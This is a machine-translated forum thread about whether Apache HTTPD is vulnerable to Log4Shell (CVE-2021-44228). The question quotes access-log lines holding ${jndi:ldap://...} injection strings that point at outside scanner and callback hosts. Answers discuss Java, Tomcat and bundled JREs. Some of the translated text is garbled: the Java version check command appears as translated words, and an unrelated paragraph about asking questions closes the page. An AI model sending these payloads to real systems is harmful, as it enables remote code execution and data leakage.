Điểm:44

Máy chủ web Apache có sử dụng log4j (CVE-2021-44228) không?

lá cờ cn

Máy chủ web apache (apache2) có sử dụng log4j không?

Tôi đã cài đặt Apache2 2.4.38 (debian) trên Raspberry Pi OS (64bit) và tìm thấy một số bản ghi lạ trong nhật ký của tôi về CVE-2021-44228 từ kryptoslogic-cve-2021-44228.com (honeypot/máy quét), dữ liệu thống kê.com (ngoại tuyến & độc hại?) và a8fvkc.dnslog.cn (Tôi không biết đây là gì)

Tôi nên làm gì bây giờ?

  • không có gì vì apache2 không bị ảnh hưởng bởi CVE-2021-44228
  • định dạng mọi thứ và đợi vài ngày trước khi tôi cài đặt phiên bản vá lỗi
  • "kiểm tra" nếu có bất kỳ tệp .class mới nào và nếu không tiếp tục hoạt động (và sử dụng các bản vá thủ công như log4j2.formatMsgNoLookups = TRUE
  • thứ gì khác

Nhật ký:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/ một}"
Tilman Schmidt avatar
lá cờ bd
Vui lòng chia sẻ những bản ghi nhật ký "lạ" mà bạn đề cập. Thật khó để đánh giá chúng mà không nhìn thấy chúng.
user3067860 avatar
lá cờ ng
Lưu ý rằng chỉ vì phần mềm _some_ không bị ảnh hưởng không có nghĩa là bạn không chạy phần mềm khác có thể bị ảnh hưởng.
Điểm:82
lá cờ mx

Các Máy chủ HTTP Apache không được viết bằng Java, không sử dụng thư viện log4j nên không bị ảnh hưởng bởi CVE-2021-44228.

Các tệp nhật ký của bạn là từ nhật ký truy cập, chúng cho thấy mọi người đang quét lỗ hổng log4j.

mckenzm avatar
lá cờ in
Thật tốt khi thấy Tomcat được đề cập trong một câu trả lời khác.
lá cờ mx
Không liên quan trực tiếp, nhưng nếu bạn tìm thấy QA này để kiểm tra thiết lập Máy chủ HTTP Apache của mình, hãy đảm bảo nâng cấp lên phiên bản 2.4.52. Các phiên bản trước có [lỗ hổng bảo mật](https://httpd.apache.org/security/vulnerabilities_24.html) của riêng chúng, chẳng hạn như [CVE-2021-44224](https://cve.mitre.org/cgi-bin/cvename .cgi?name=CVE-2021-44224).
Điểm:8
lá cờ ng

Bản thân Apache không được viết bằng Java và không liên kết trực tiếp với thư viện Log4j khét tiếng. Nó đặc biệt an toàn trước lỗ hổng này.

Điều gì khác có thể đi sai, sau đó?

  1. Không phải mọi thứ có tên Apache và các chức năng HTTP đều chính xác các Máy chủ HTTPD Apache.Ví dụ, Apache Tomcat là máy chủ web HTTP hoàn toàn khác. Nó được viết bằng Java và có thể được cấu hình khá nhiều để sử dụng Log4J. Tôi không thực sự chắc chắn liệu có thể đăng nhập vào Tomcat hay không.

Một người có ít kinh nghiệm và kiến ​​thức hơn hoàn toàn có thể nhầm lẫn hai điều đó. Và, theo hiểu biết của tôi, Tomcat nói chung có hồ sơ theo dõi bảo mật tốt hơn so với Apache HTTPD "cổ điển".

(Theo nhận xét của Bob, cơ sở ghi nhật ký mặc định trong Tomcat không phải là Log4J.)

  1. Apache HTTPD có thể mở rộng rất nhiều. Nó có thể được cấu hình để gọi những thứ khác trong nền bằng nhiều giao diện khác nhau (ví dụ: để tìm nạp các trang web động được tạo theo chương trình). Một số "thứ trong nền" này có thể dựa trên java và được liên kết với thư viện Log4J.

Số dặm của bạn có thể thay đổi, đặc biệt nếu bạn không biết chi tiết về ngăn xếp phần mềm của mình.


Để chắc chắn, trước tiên bạn nên kiểm tra xem mình có cài đặt máy Java nào không. Trong trình quản lý gói của bạn, các gói của nó sẽ được gọi là JRE-gì đó, JVM-gì đó hoặc có thể là JAVA-gì đó.

Bạn cũng có thể thử:

phiên bản java

trong vỏ của bạn.

Nếu bạn không có bất kỳ thứ nào trong số này và bạn đã không cài đặt JAVA bên ngoài trình quản lý gói của mình, thì bạn vẫn an toàn.

Nói chung là không an toàn, nhưng ít nhất là an toàn với CVE-2021-44228.

lá cờ kz
Bob
*> Tôi không thực sự chắc chắn liệu có thể đăng nhập bằng cách khác trong Tomcat hay không. * Tomcat, theo mặc định, không sử dụng log4j trừ khi được định cấu hình khác. [Theo mặc định, nó sử dụng `java.util.logging` thông qua một nhánh của Apache Commons Logging.](https://tomcat.apache.org/tomcat-9.0-doc/logging.html) Trong 8.0 [hướng dẫn](https: //tomcat.apache.org/tomcat-8.0-doc/logging.html#Using_Log4j) đã được cung cấp để chuyển sang log4j nhưng chúng [đã bị xóa](https://tomcat.apache.org/tomcat-8.5-doc/logging .html) trong 8.5.
lá cờ kz
Bob
*> Nếu bạn không có bất kỳ thứ nào trong số này và bạn đã không cài đặt JAVA bên ngoài trình quản lý gói của mình thì bạn vẫn an toàn.* Bản chất của JRE và cách nó được phân phối lại có nghĩa là nhiều ứng dụng có thể và sẽ nhúng nó thay vì sử dụng trình quản lý gói hệ điều hành (nếu có... hãy xem Windows và macOS). Chắc chắn **không** an toàn nếu cho rằng bạn không có bất kỳ chương trình dễ bị tấn công nào chỉ vì bạn không tự cài đặt Java, trình quản lý gói hoặc cách khác. Các phiên bản được nhúng đó thường không phải là một phần của `PATH` của bạn, vì vậy việc thử nghiệm `java` trong trình bao của bạn không đảm bảo an toàn.
fraxinus avatar
lá cờ ng
Q hỏi rõ ràng về Rapsbian. Trong Linux, các ứng dụng (đặc biệt là ứng dụng máy chủ) thường không mang theo JVM của chúng, chúng chỉ liệt kê nó dưới dạng phụ thuộc và trình quản lý gói mang đến bất cứ thứ gì cần thiết.
lá cờ ec
@fraxinus mặc dù có rất nhiều người đang cố phá hỏng điều đó bằng những thứ như Snaps.
lá cờ il
@fraxinus bạn không thể khái quát hóa điều đó. Ví dụ, các sản phẩm đàn hồi gói JRE của riêng họ. Với Java hiện đại, thậm chí không có JRE độc lập được cung cấp - các nhà phát triển phải tự biên dịch cho nhu cầu ứng dụng của họ.
lá cờ kz
Bob
@fraxinus Vấn đề khi nói về bảo mật là "nói chung" là không đủ tốt. Có đủ sản phẩm, đặc biệt là các sản phẩm dành cho doanh nghiệp lớn (bao gồm cả trên Linux), sẽ đóng gói JRE của riêng họ rằng đó là mối quan tâm chính đáng. Đặc biệt là với một lỗ hổng nghiêm trọng như vậy. Ngoài ra, mặc dù nội dung câu hỏi này có thể đề cập cụ thể đến Raspbian, nhưng tiêu đề câu hỏi có thể nhắc người khác xem xét câu hỏi - và IMO khi đưa ra lời khuyên bảo mật, tốt nhất là nên bao gồm tất cả các cơ sở.
fraxinus avatar
lá cờ ng
Bạn KHÔNG THỂ bao gồm tất cả các cơ sở trong câu trả lời bảo mật cho một câu hỏi đơn giản. Biết ngăn xếp phần mềm của bạn là điều cần thiết và nếu không, bạn xứng đáng với những gì bạn nhận được. Nếu không có điều này, bạn sẽ sử dụng các công thức nấu ăn có chữ "nói chung" trong đó.
mckenzm avatar
lá cờ in
@fraxinus họ chắc chắn làm được. Các trường hợp Primo bao gồm Minecraft và Arduino. Họ tự mang theo. Không chỉ vậy mà rất nhiều đòn bẩy vùng chứa xoay quanh phiên bản trước 8 và thậm chí là trước phiên bản 6. Các vùng chứa sẽ bị bỏ tù %&^!.

Đăng câu trả lời

Hầu hết mọi người không hiểu rằng việc đặt nhiều câu hỏi sẽ mở ra cơ hội học hỏi và cải thiện mối quan hệ giữa các cá nhân. Ví dụ, trong các nghiên cứu của Alison, mặc dù mọi người có thể nhớ chính xác có bao nhiêu câu hỏi đã được đặt ra trong các cuộc trò chuyện của họ, nhưng họ không trực giác nhận ra mối liên hệ giữa câu hỏi và sự yêu thích. Qua bốn nghiên cứu, trong đó những người tham gia tự tham gia vào các cuộc trò chuyện hoặc đọc bản ghi lại các cuộc trò chuyện của người khác, mọi người có xu hướng không nhận ra rằng việc đặt câu hỏi sẽ ảnh hưởng—hoặc đã ảnh hưởng—mức độ thân thiện giữa những người đối thoại.